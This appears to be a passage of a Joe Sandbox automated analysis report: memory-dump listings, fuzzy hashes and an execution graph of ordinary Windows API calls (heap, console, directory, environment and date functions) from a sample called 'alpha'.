                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3$3
                                                                    • API String ID: 0-2538865259
                                                                    • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                    • Instruction ID: c84593214257da9c0c78b3f7993648304fe906499a0e274d17b7a204cb808c3d
                                                                    • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                    • Instruction Fuzzy Hash: 38012731E0ED829AF314BF619984278BA72BB40B3DFD44136C50E455A2DF2C688F8671
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706D6
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706F0
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF71967074D
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF719670762
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                    • Instruction ID: 02bf7041f20e24eae75849f9e79055f0163c80a30c049b95732faef6ebc930d3
                                                                    • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                    • Instruction Fuzzy Hash: BA415C76A0AB4286EA18AF10E45017DF7B2FF85BA8B948535CA4E07750DF3CE44AC770

                                                                    Execution Graph

                                                                    Execution Coverage:5.7%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:1033
                                                                    Total number of Limit Nodes:25
                                                                    execution_graph 16776 7ff71968f290 16777 7ff71968f2c0 16776->16777 16778 7ff71968f2c7 16776->16778 16785 7ff71966bd38 16777->16785 16778->16777 16779 7ff71968f2f5 16778->16779 16793 7ff719663240 16779->16793 16781 7ff71968f2f3 16796 7ff719678f80 16781->16796 16786 7ff71966bd6f 16785->16786 16791 7ff71966bda2 16785->16791 16786->16791 16804 7ff71968eaf0 16786->16804 16788 7ff71967c4ab 16789 7ff719663240 166 API calls 16788->16789 16788->16791 16790 7ff71967c4bc 16789->16790 16790->16791 16792 7ff719663240 166 API calls 16790->16792 16791->16781 16792->16790 16794 7ff7196632b0 166 API calls 16793->16794 16795 7ff71966326c 16794->16795 16795->16781 16797 7ff719678f89 16796->16797 16798 7ff719678f94 16797->16798 16799 7ff719678fe0 RtlCaptureContext RtlLookupFunctionEntry 16797->16799 16800 7ff719679067 16799->16800 16801 7ff719679025 RtlVirtualUnwind 16799->16801 17261 7ff719678fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16800->17261 16801->16800 16809 7ff719663410 16804->16809 16808 7ff71968eb2e 16808->16788 16810 7ff71966345c FormatMessageW 16809->16810 16811 7ff7196812cd _ultoa GetACP 16809->16811 16810->16811 16819 7ff71966348b 16810->16819 16853 7ff719670460 16811->16853 16814 7ff71966349d wcschr 16815 7ff7196634b4 16814->16815 16814->16819 16816 7ff71968121d GetProcessHeap HeapAlloc 16815->16816 16817 7ff7196634c4 FormatMessageW 16815->16817 16818 7ff7196634ef 16816->16818 16822 7ff71968124f FormatMessageW GetProcessHeap RtlFreeHeap 16816->16822 16817->16818 16820 7ff719678f80 7 API calls 16818->16820 16819->16814 16819->16815 16823 7ff7196634ff 16820->16823 16822->16811 16824 7ff71966b998 16823->16824 16855 7ff71966cd90 16824->16855 16827 7ff71966b9a6 16827->16808 16854 7ff719670472 MultiByteToWideChar 16853->16854 16856 7ff71967c84e 16855->16856 16857 7ff71966cda1 GetProcessHeap HeapAlloc 16855->16857 16864 7ff719663278 16856->16864 16857->16856 16859 7ff71966b9a1 16857->16859 16859->16827 16861 7ff71968e91c 16859->16861 17048 7ff71968e9b4 16861->17048 16867 7ff7196632b0 16864->16867 16903 7ff719673578 _get_osfhandle 16867->16903 16870 7ff7196632f0 _get_osfhandle GetConsoleScreenBufferInfo 16871 7ff71966331d 16870->16871 16872 7ff719663410 18 API calls 16871->16872 16884 7ff71966333d 16872->16884 16873 7ff7196633a8 16878 7ff7196811ff 16873->16878 16891 7ff7196633b0 16873->16891 16874 7ff719663368 WriteConsoleW 16876 7ff7196811cc GetLastError 16874->16876 16874->16884 16876->16884 16877 7ff719681057 GetConsoleScreenBufferInfo 16880 7ff719681079 WriteConsoleW 16877->16880 16877->16884 16918 7ff719674c1c 16878->16918 16879 7ff719678f80 7 API calls 16885 7ff7196632a4 16879->16885 16880->16884 16886 7ff7196810a8 9 API calls 16880->16886 16882 7ff7196811df GetLastError 16882->16873 16883 7ff719663400 16883->16882 16884->16873 16884->16874 16884->16876 16884->16877 16884->16882 16884->16883 16910 7ff7196736ec _get_osfhandle 16884->16910 16886->16884 16887 7ff719681181 16886->16887 16917 7ff71968bde4 EnterCriticalSection LeaveCriticalSection 16887->16917 16891->16879 16904 7ff719673599 GetFileType 16903->16904 16905 7ff7196632e8 16903->16905 16904->16905 16908 7ff7196735b1 16904->16908 16905->16870 16905->16871 16906 7ff71967e940 16907 7ff7196735c3 GetStdHandle 16909 7ff7196735d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 16907->16909 16908->16906 16908->16907 16908->16909 16909->16905 16911 7ff71967e95c WriteFile 16910->16911 16916 7ff719673731 16910->16916 16912 7ff71967e980 WideCharToMultiByte WriteFile 16911->16912 16915 7ff7196737a1 16912->16915 16912->16916 16913 7ff719673747 16914 7ff71967374b WideCharToMultiByte WriteFile 16913->16914 16913->16915 16914->16915 16915->16884 16916->16912 16916->16913 16916->16915 16919 7ff719674c24 16918->16919 16921 7ff719674c2f exit 16919->16921 16922 7ff719674c50 16919->16922 16928 7ff719674cb0 16922->16928 16924 7ff719674c6c 16924->16919 16930 7ff719674cfa 16928->16930 16933 7ff719674cda 16928->16933 16929 7ff719678f80 7 API calls 16931 7ff719674c64 16929->16931 16932 7ff71967eefe realloc 16930->16932 16930->16933 16931->16924 16934 7ff719673c24 16931->16934 16932->16933 16933->16929 16935 7ff719673c67 16934->16935 16981 7ff71967412c 16935->16981 16999 7ff71966ca40 16935->16999 16937 7ff719678f80 7 API calls 16939 7ff71967413e GetProcessHeap RtlFreeHeap 16937->16939 16939->16924 16940 7ff71967ec97 16941 7ff71967855c ??_V@YAXPEAX 16940->16941 16943 7ff71967eca1 16941->16943 16945 7ff719673cb8 GetCurrentDirectoryW towupper iswalpha 16947 7ff719673fb8 16945->16947 16948 7ff719673d68 16945->16948 16950 7ff719673fc6 GetLastError 16947->16950 16948->16947 16949 7ff719673d72 towupper GetFullPathNameW 16948->16949 16949->16950 16951 7ff719673dd3 16949->16951 17041 7ff71967855c 16950->17041 16955 7ff719673fe0 16951->16955 16961 7ff719673de3 16951->16961 16953 7ff7196740fe 16957 7ff71967855c ??_V@YAXPEAX 16953->16957 16954 7ff71967855c ??_V@YAXPEAX 16956 7ff719673ffb _local_unwind 16954->16956 16955->16954 16958 7ff71967400c GetLastError 16956->16958 16959 7ff719674108 _local_unwind 16957->16959 16962 7ff719674028 16958->16962 16963 7ff719673e95 16958->16963 16960 7ff719673f98 16959->16960 17044 7ff71966ff70 16960->17044 16961->16953 16970 7ff719673e66 GetFileAttributesW 16961->16970 16962->16963 16965 7ff719674031 16962->16965 16966 7ff719673ecf 16963->16966 17014 7ff719672978 16963->17014 16971 7ff71967855c ??_V@YAXPEAX 16965->16971 16968 7ff719673f08 16966->16968 16969 7ff719673ed5 GetFileAttributesW 16966->16969 16977 7ff719673f1e SetCurrentDirectoryW 16968->16977 16983 7ff719673f46 16968->16983 16975 7ff719673efd 16969->16975 16976 7ff719674067 GetLastError 16969->16976 16970->16958 16970->16963 16978 7ff71967403b _local_unwind 16971->16978 16973 7ff719673ec7 16973->16966 16979 7ff71967404c 16973->16979 16974 7ff71967855c ??_V@YAXPEAX 16974->16981 16975->16968 16982 7ff71967409d 16975->16982 16980 7ff71967855c ??_V@YAXPEAX 16976->16980 16977->16983 16984 7ff7196740b8 GetLastError 16977->16984 16978->16979 16989 7ff71967855c ??_V@YAXPEAX 16979->16989 16985 7ff71967408c _local_unwind 16980->16985 16981->16937 16986 7ff71967855c ??_V@YAXPEAX 16982->16986 17027 7ff71967498c 16983->17027 16987 7ff71967855c ??_V@YAXPEAX 16984->16987 16985->16982 16991 7ff7196740a7 _local_unwind 16986->16991 16992 7ff7196740d2 _local_unwind 16987->16992 16990 7ff719674056 _local_unwind 16989->16990 16990->16976 16991->16984 16994 7ff7196740e3 16992->16994 16996 7ff71967855c ??_V@YAXPEAX 16994->16996 16995 7ff719673f6f 17032 7ff71967417c 16995->17032 16998 7ff7196740ed _local_unwind 16996->16998 16998->16953 17000 7ff71966ca59 16999->17000 17001 7ff71966cab8 16999->17001 17002 7ff719679324 malloc 17000->17002 17001->16940 17010 7ff71966b900 17001->17010 17003 7ff71966ca7b 17002->17003 17004 7ff71966ca84 17003->17004 17005 7ff71967c6e0 17003->17005 17006 7ff71966ca9b memset 17004->17006 17007 7ff71967c706 ??_V@YAXPEAX 17004->17007 17008 7ff719686d1c 14 API calls 17005->17008 17006->17001 17008->17001 17011 7ff71966b914 17010->17011 17011->17011 17012 7ff71966cd90 166 API calls 17011->17012 17013 7ff71966b92a 17012->17013 17013->16940 17013->16945 17015 7ff7196729b9 17014->17015 17015->17015 17016 7ff71967e3f7 17015->17016 17017 7ff719672a1e FindFirstFileW 17015->17017 17019 7ff7196729ed 17015->17019 17020 7ff719672aeb _wcsnicmp 17015->17020 17023 7ff71967e3d6 _wcsicmp 17015->17023 17024 7ff719672a9d memmove 17015->17024 17025 7ff71967e404 memmove 17015->17025 17016->16973 17017->17016 17018 7ff719672a44 FindClose 17017->17018 17018->17015 17021 7ff719678f80 7 API calls 17019->17021 17020->17015 17022 7ff719672a02 17021->17022 17022->16973 17023->17015 17023->17016 17024->17015 17025->17016 17028 7ff7196749ba SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 17027->17028 17029 7ff7196749a4 17027->17029 17030 7ff719674a14 GetEnvironmentStringsW GetProcessHeap HeapAlloc memmove FreeEnvironmentStringsW 17028->17030 17029->17028 17031 7ff719673f67 17030->17031 17031->16994 17031->16995 17033 7ff7196741a8 GetCurrentDirectoryW 17032->17033 17034 7ff7196741d4 towupper 17032->17034 17040 7ff7196741b9 17033->17040 17035 7ff71967081c 163 API calls 17034->17035 17037 7ff719674204 17035->17037 17036 7ff719678f80 7 API calls 17038 7ff7196741c8 17036->17038 17039 7ff71967ecac towupper 17037->17039 17037->17040 17038->16960 17040->17036 17042 7ff719678574 ??_V@YAXPEAX 17041->17042 17043 7ff719678583 17041->17043 17042->17043 17043->16955 17045 7ff71966ff7c 17044->17045 17046 7ff71966ffdb 17044->17046 17045->17046 17047 7ff71966ffb5 GetProcessHeap RtlFreeHeap 17045->17047 17046->16974 17047->17046 17050 7ff71968ea0f 17048->17050 17051 7ff71968e9d9 17048->17051 17049 7ff71968ea67 17078 7ff71968c978 17049->17078 17050->17049 17073 7ff71966af98 17050->17073 17060 7ff719666a48 17051->17060 17055 7ff71968ea6c 17057 7ff71968eaae 17055->17057 17088 7ff71966d208 17055->17088 17056 7ff71968eacf 17057->17056 17093 7ff719673a0c 17057->17093 17061 7ff719666b23 17060->17061 17063 7ff719666a51 17060->17063 17061->17050 17062 7ff71968417c 17103 7ff71968ec14 memset 17062->17103 17063->17061 17063->17062 17064 7ff719666ab2 17063->17064 17066 7ff719673c24 166 API calls 17064->17066 17068 7ff719666abf GetProcessHeap RtlFreeHeap 17066->17068 17099 7ff719666b84 SetEnvironmentStringsW GetProcessHeap RtlFreeHeap 17068->17099 17074 7ff71966afb1 17073->17074 17075 7ff71966afdb 17074->17075 17077 7ff71966d208 _close 17074->17077 17259 7ff71966b038 _dup2 17074->17259 17075->17050 17077->17074 17079 7ff71968ca9e 17078->17079 17080 7ff71968c98e 17078->17080 17079->17055 17081 7ff71968ee4c TerminateProcess GetLastError 17080->17081 17082 7ff71968c9b3 17080->17082 17081->17080 17082->17079 17083 7ff719675cb4 7 API calls 17082->17083 17084 7ff71966d208 _close 17082->17084 17085 7ff71968ca21 _get_osfhandle FlushFileBuffers 17082->17085 17087 7ff71966b038 _dup2 17082->17087 17083->17082 17084->17082 17086 7ff71966b038 _dup2 17085->17086 17086->17082 17087->17082 17089 7ff71966d246 17088->17089 17090 7ff71966d211 17088->17090 17089->17055 17091 7ff71966d238 _close 17090->17091 17092 7ff71967ca0e 17090->17092 17091->17089 17092->17055 17094 7ff719673a53 FindClose 17093->17094 17098 7ff719673a25 17093->17098 17095 7ff719673a66 17094->17095 17096 7ff719673a74 GetLastError 17094->17096 17095->17057 17096->17095 17097 7ff71967ec38 17098->17094 17098->17097 17124 7ff719674a14 GetEnvironmentStringsW 17099->17124 17102 7ff719666b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 17104 7ff71966ca40 17 API calls 17103->17104 17105 7ff71968ec96 17104->17105 17106 7ff71968edf7 17105->17106 17130 7ff71967081c GetEnvironmentVariableW 17105->17130 17107 7ff71968ee16 17106->17107 17108 7ff71968ee0a ??_V@YAXPEAX 17106->17108 17110 7ff719678f80 7 API calls 17107->17110 17108->17107 17112 7ff719684190 17110->17112 17113 7ff71968ecd2 SetCurrentDirectoryW 17115 7ff71968edd4 17113->17115 17116 7ff71968ece9 SetErrorMode 17113->17116 17114 7ff71968ecfb 17117 7ff71967498c 8 API calls 17114->17117 17119 7ff71967417c 166 API calls 17115->17119 17116->17114 17118 7ff71968ed89 SetCurrentDirectoryW 17117->17118 17120 7ff71968edc1 17118->17120 17121 7ff71968edac GetLastError 17118->17121 17119->17106 17120->17115 17123 7ff71968edc6 SetErrorMode 17120->17123 17122 7ff719663278 166 API calls 17121->17122 17122->17120 17123->17115 17125 7ff719666ae8 17124->17125 17126 7ff719674a40 GetProcessHeap HeapAlloc 17124->17126 17125->17102 17128 7ff719674a91 memmove 17126->17128 17129 7ff719674a9f FreeEnvironmentStringsW 17126->17129 17128->17129 17129->17125 17131 7ff71967085e 17130->17131 17132 7ff719670877 17130->17132 17131->17113 17131->17114 17133 7ff719670884 _wcsicmp 17132->17133 17134 7ff719670970 17132->17134 17135 7ff7196708a2 _wcsicmp 17133->17135 17136 7ff719670989 17133->17136 17151 7ff719673140 17134->17151 17135->17136 17137 7ff7196708c0 _wcsicmp 17135->17137 17138 7ff71967417c 154 API calls 17136->17138 17177 7ff7196733f0 17136->17177 17181 7ff719666ee4 17136->17181 17215 7ff719679158 RtlCaptureContext RtlLookupFunctionEntry 17136->17215 17137->17136 17139 7ff7196708de _wcsicmp 17137->17139 17138->17136 17142 7ff7196708fc _wcsicmp 17139->17142 17143 7ff71967d8d3 GetCommandLineW 17139->17143 17142->17136 17144 7ff71967091a _wcsicmp 17142->17144 17146 7ff71967d8e5 rand 17143->17146 17144->17134 17147 7ff719670934 _wcsicmp 17144->17147 17146->17136 17147->17146 17149 7ff719670952 _wcsicmp 17147->17149 17149->17134 17150 7ff71967d8f9 GetNumaHighestNodeNumber 17149->17150 17150->17136 17152 7ff71967e59e 17151->17152 17153 7ff719673184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17151->17153 17220 7ff719688654 17152->17220 17155 7ff71967e5ed 17153->17155 17156 7ff7196731e0 17153->17156 17158 7ff71967e5fe 17155->17158 17166 7ff71967e750 17155->17166 17157 7ff71967e5a8 17156->17157 17159 7ff7196731ff 17156->17159 17226 7ff719673448 17157->17226 17231 7ff719675508 GetUserDefaultLCID 17158->17231 17160 7ff7196733f0 _vsnwprintf 17159->17160 17164 7ff719673247 17160->17164 17167 7ff719678f80 7 API calls 17164->17167 17165 7ff7196733f0 _vsnwprintf 17172 7ff71967e748 17165->17172 17166->17165 17169 7ff719673266 17167->17169 17168 7ff71967e711 17170 7ff719675508 GetUserDefaultLCID 17168->17170 17169->17136 17173 7ff71967e716 GetTimeFormatW 17170->17173 17171 7ff71967e5e8 17172->17171 17233 7ff7196734a0 17172->17233 17173->17172 17175 7ff71967e629 17175->17168 17176 7ff71967e6e7 memmove 17175->17176 17176->17175 17178 7ff719673421 17177->17178 17179 7ff719673433 17177->17179 17256 7ff719673684 _vsnwprintf 17178->17256 17179->17136 17182 7ff719666f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17181->17182 17208 7ff719666fbf 17181->17208 17183 7ff719666f90 17182->17183 17190 7ff7196842b6 17182->17190 17185 7ff719675508 GetUserDefaultLCID 17183->17185 17184 7ff719688654 9 API calls 17184->17208 17186 7ff719666f97 GetLocaleInfoW 17185->17186 17186->17208 17187 7ff719684322 realloc 17188 7ff71968433f 17187->17188 17187->17190 17189 7ff7196733f0 _vsnwprintf 17188->17189 17197 7ff71968437d 17189->17197 17190->17187 17190->17188 17192 7ff719663278 153 API calls 17190->17192 17191 7ff719675508 GetUserDefaultLCID 17193 7ff719667042 GetDateFormatW 17191->17193 17192->17190 17194 7ff71966707a 17193->17194 17195 7ff719675508 GetUserDefaultLCID 17194->17195 17201 7ff71966708a 17194->17201 17196 7ff71966714a GetDateFormatW 17195->17196 17198 7ff719667175 realloc 17196->17198 17199 7ff7196842a0 GetLastError 17196->17199 17203 7ff7196843ea 17197->17203 17209 7ff7196843fb 17197->17209 17198->17190 17202 7ff71966719c 17198->17202 17199->17190 17200 7ff71968427f memmove 17200->17208 17201->17197 17212 7ff7196670bd 17201->17212 17204 7ff719675508 GetUserDefaultLCID 17202->17204 17206 7ff719673448 153 API calls 17203->17206 17207 7ff7196671ae GetDateFormatW 17204->17207 17205 7ff719667020 memmove 17205->17208 17211 7ff7196843f9 17206->17211 17207->17199 17207->17208 17208->17184 17208->17191 17208->17200 17208->17205 17210 7ff719673448 153 API calls 17209->17210 17210->17211 17212->17211 17212->17212 17213 7ff719678f80 7 API calls 17212->17213 17214 7ff719667129 17213->17214 17214->17136 17216 7ff7196791d7 17215->17216 17217 7ff719679195 RtlVirtualUnwind 17215->17217 17258 7ff719678fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17216->17258 17217->17216 17221 7ff719688673 GetSystemTime 17220->17221 17222 7ff719688686 17220->17222 17223 7ff7196886cc SystemTimeToFileTime 17221->17223 17222->17223 17224 7ff719678f80 7 API calls 17223->17224 17225 7ff7196886ed 17224->17225 17225->17157 17227 7ff71967363c _vsnwprintf 17226->17227 17228 7ff71967347b 17227->17228 17229 7ff7196734a0 166 API calls 17228->17229 17230 7ff719673491 17229->17230 17230->17171 17232 7ff719675529 GetLocaleInfoW 17231->17232 17232->17175 17234 7ff7196734bf 17233->17234 17250 7ff7196734f5 17233->17250 17235 7ff719673578 6 API calls 17234->17235 17236 7ff7196734c9 17235->17236 17237 7ff71967350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 17236->17237 17238 7ff7196734cd 17236->17238 17240 7ff719673557 ReleaseSRWLockShared 17237->17240 17241 7ff71967e8d2 GetLastError 17237->17241 17239 7ff7196736ec 6 API calls 17238->17239 17242 7ff7196734e1 17239->17242 17240->17242 17243 7ff71967e8e5 GetLastError 17241->17243 17242->17243 17242->17250 17244 7ff7196701b8 6 API calls 17243->17244 17245 7ff71967e904 17244->17245 17246 7ff71967e918 17245->17246 17247 7ff71967e908 17245->17247 17249 7ff71968f318 _get_osfhandle GetFileType 17246->17249 17248 7ff719663278 160 API calls 17247->17248 17248->17250 17251 7ff71967e91f 17249->17251 17250->17171 17252 7ff71967e923 17251->17252 17253 7ff71967e931 17251->17253 17254 7ff719663278 160 API calls 17252->17254 17255 7ff71968f1d8 160 API calls 17253->17255 17254->17250 17255->17250 17257 7ff7196736b7 17256->17257 17257->17179 17260 7ff71966b061 17259->17260 17260->17074 17262 7ff719689690 17263 7ff71968969f 17262->17263 17264 7ff7196896b7 17262->17264 17268 7ff719689308 17263->17268 17266 7ff719689308 226 API calls 17264->17266 17267 7ff7196896a4 17266->17267 17269 7ff71968932c 17268->17269 17270 7ff719689327 17268->17270 17272 7ff719689383 17269->17272 17273 7ff71968934b wcschr 17269->17273 17283 7ff7196709f4 17270->17283 17288 7ff71966d3f0 17272->17288 17273->17272 17274 7ff719689361 17273->17274 17277 7ff71967498c 8 API calls 17274->17277 17282 7ff719689381 17277->17282 17278 7ff7196893a8 17279 7ff71967081c 166 API calls 17278->17279 17280 7ff7196893bd 17279->17280 17281 7ff719673448 166 API calls 17280->17281 17281->17282 17282->17267 17284 7ff719670a0b iswspace 17283->17284 17285 7ff719670a3c 17283->17285 17286 7ff719670a21 wcschr 17284->17286 17287 7ff719670a50 17284->17287 17285->17269 17286->17285 17286->17287 17287->17284 17287->17285 17287->17286 17289 7ff71966d810 17288->17289 17290 7ff71966d420 17288->17290 17291 7ff71966b998 207 API calls 17289->17291 17292 7ff71967caad 17290->17292 17293 7ff71966d46e GetProcessHeap HeapAlloc 17290->17293 17298 7ff71966d515 17291->17298 17294 7ff719663278 166 API calls 17292->17294 17293->17292 17299 7ff71966d49a 17293->17299 17295 7ff71967cab7 17294->17295 17296 7ff71968e91c 198 API calls 17308 7ff71966d544 17296->17308 17297 7ff719679158 7 API calls 17297->17308 17298->17308 17299->17298 17300 7ff71966d4e8 wcschr 17299->17300 17299->17308 17300->17299 17301 7ff71967ca31 wcschr 17301->17308 17302 7ff71966d54a iswspace 17305 7ff71966d561 wcschr 17302->17305 17302->17308 17303 7ff71966d5ee GetProcessHeap HeapReAlloc 17303->17292 17304 7ff71966d61d GetProcessHeap HeapSize 17303->17304 17304->17308 17305->17308 17306 7ff71966d586 wcschr 17306->17308 17307 7ff71966d6ff iswspace 17307->17308 17309 7ff71966d712 wcschr 17307->17309 17308->17292 17308->17296 17308->17297 17308->17301 17308->17302 17308->17303 17308->17306 17308->17307 17310 7ff71966d668 17308->17310 17312 7ff71966d6c5 wcschr 17308->17312 17313 7ff71966d759 wcschr 17308->17313 17315 7ff71967ca5a wcschr 17308->17315 17309->17308 17311 7ff719678f80 7 API calls 17310->17311 17314 7ff71966d6a0 17311->17314 17312->17308 17313->17308 17314->17274 17314->17278 17315->17308 16723 7ff719678d80 16724 7ff719678da4 16723->16724 16725 7ff719678db6 16724->16725 16726 7ff719678dbf Sleep 16724->16726 16727 7ff719678ddb _amsg_exit 16725->16727 16729 7ff719678de7 16725->16729 16726->16724 16727->16729 16728 7ff719678e56 _initterm 16730 7ff719678e73 _IsNonwritableInCurrentImage 16728->16730 16729->16728 16729->16730 16736 7ff719678e3c 16729->16736 16737 7ff7196737d8 GetCurrentThreadId OpenThread 16730->16737 16770 7ff7196704f4 16737->16770 16739 7ff719673839 HeapSetInformation RegOpenKeyExW 16740 7ff71967388d 16739->16740 16741 7ff71967e9f8 RegQueryValueExW RegCloseKey 16739->16741 16742 7ff719675920 VirtualQuery VirtualQuery 16740->16742 16744 7ff71967ea41 GetThreadLocale 16741->16744 16743 7ff7196738ab GetConsoleOutputCP GetCPInfo 16742->16743 16743->16744 16745 7ff7196738f1 memset 16743->16745 16761 7ff719673919 16744->16761 16745->16761 16746 7ff719674d5c 391 API calls 16746->16761 16747 7ff71967eb27 _setjmp 16747->16761 16748 7ff719673948 _setjmp 16748->16761 16749 7ff719688530 370 API calls 16749->16761 16750 7ff719663240 166 API calls 16750->16761 16751 7ff7196701b8 6 API calls 16751->16761 16752 7ff719674c1c 166 API calls 16752->16761 16753 7ff71966df60 481 API calls 16753->16761 16754 7ff71967eb71 _setmode 16754->16761 16755 7ff7196786f0 182 API calls 16755->16761 16756 7ff719670580 12 API calls 16757 7ff71967398b GetConsoleOutputCP GetCPInfo 16756->16757 16759 7ff7196704f4 GetModuleHandleW GetProcAddress SetThreadLocale 16757->16759 16758 7ff7196758e4 EnterCriticalSection LeaveCriticalSection 16758->16761 16759->16761 16760 7ff71966be00 647 API calls 16760->16761 16761->16741 16761->16746 16761->16747 16761->16748 16761->16749 16761->16750 16761->16751 16761->16752 16761->16753 16761->16754 16761->16755 16761->16756 16761->16758 16761->16760 16762 7ff7196758e4 EnterCriticalSection LeaveCriticalSection 16761->16762 16763 7ff71967ebbe GetConsoleOutputCP GetCPInfo 16762->16763 16764 7ff7196704f4 GetModuleHandleW GetProcAddress SetThreadLocale 16763->16764 16765 7ff71967ebe6 16764->16765 16766 7ff71966be00 647 API calls 16765->16766 16767 7ff719670580 12 API calls 16765->16767 16766->16765 16768 7ff71967ebfc GetConsoleOutputCP GetCPInfo 16767->16768 16769 7ff7196704f4 GetModuleHandleW GetProcAddress SetThreadLocale 16768->16769 16769->16761 16771 7ff719670504 16770->16771 16772 7ff71967051e GetModuleHandleW 16771->16772 16773 7ff71967054d GetProcAddress 16771->16773 16774 7ff71967056c SetThreadLocale 16771->16774 16772->16771 16773->16771 22097 7ff71966b3f0 22100 7ff71966b41a 22097->22100 22098 7ff71967c2a3 iswdigit 22099 7ff71967c2b7 22098->22099 22098->22100 22101 7ff719663278 166 API calls 22099->22101 22100->22098 22102 7ff71966b42f 22100->22102 22104 7ff71966b461 22101->22104 22105 7ff71966be00 22102->22105 22106 7ff71966bec8 22105->22106 22107 7ff71966be1b 22105->22107 22106->22104 22107->22106 22108 7ff71966be67 22107->22108 22109 7ff71966be47 memset 22107->22109 22111 7ff71966be73 22108->22111 22113 7ff71966bf29 22108->22113 22114 7ff71966beaf 22108->22114 22211 7ff71966bff0 22109->22211 22112 7ff71966be92 22111->22112 22117 7ff71966bf0c 22111->22117 22123 7ff71966bea1 22112->22123 22139 7ff71966c620 GetConsoleTitleW 22112->22139 22115 7ff71966cd90 166 API calls 22113->22115 22114->22106 22120 7ff71966bff0 185 API calls 22114->22120 22116 7ff71966bf33 22115->22116 22116->22114 22121 7ff71966bf70 22116->22121 22124 7ff7196688a8 _wcsicmp 22116->22124 22249 7ff71966b0d8 memset 22117->22249 22120->22106 22133 7ff71966bf75 22121->22133 22309 7ff7196671ec 22121->22309 22123->22114 22129 7ff71966af98 2 API calls 22123->22129 22128 7ff71966bf5a 22124->22128 22125 7ff71966bf1e 22125->22114 22127 7ff71966bfa9 22127->22114 22130 7ff71966cd90 166 API calls 22127->22130 22128->22121 22131 7ff719670a6c 273 API calls 22128->22131 22129->22114 22132 7ff71966bfbb 22130->22132 22131->22121 22132->22114 22134 7ff71967081c 166 API calls 22132->22134 22135 7ff71966b0d8 194 API calls 22133->22135 22134->22133 22136 7ff71966bf7f 22135->22136 22136->22114 22182 7ff719675ad8 22136->22182 22140 7ff71966ca2f 22139->22140 22142 7ff71966c675 22139->22142 22141 7ff71967c5fc GetLastError 22140->22141 22144 7ff719663278 166 API calls 22140->22144 22145 7ff71967855c ??_V@YAXPEAX 22140->22145 22141->22140 22143 7ff71966ca40 17 API calls 22142->22143 22151 7ff71966c69b 22143->22151 22144->22140 22145->22140 22146 7ff71966c9b5 22150 7ff71967855c ??_V@YAXPEAX 22146->22150 22147 7ff7196689c0 23 API calls 22162 7ff71966c762 22147->22162 22148 7ff71966c978 towupper 22148->22162 22149 7ff71967855c ??_V@YAXPEAX 22149->22162 22171 7ff71966c855 22150->22171 22151->22140 22151->22146 22153 7ff71966d3f0 223 API calls 22151->22153 22151->22162 22152 7ff71967c60e 22154 7ff71968ec14 173 API calls 22152->22154 22155 7ff71966c741 22153->22155 22154->22162 22157 7ff71966c74d 22155->22157 22160 7ff71966c8b5 wcsncmp 22155->22160 22156 7ff71966c872 22158 7ff71967855c 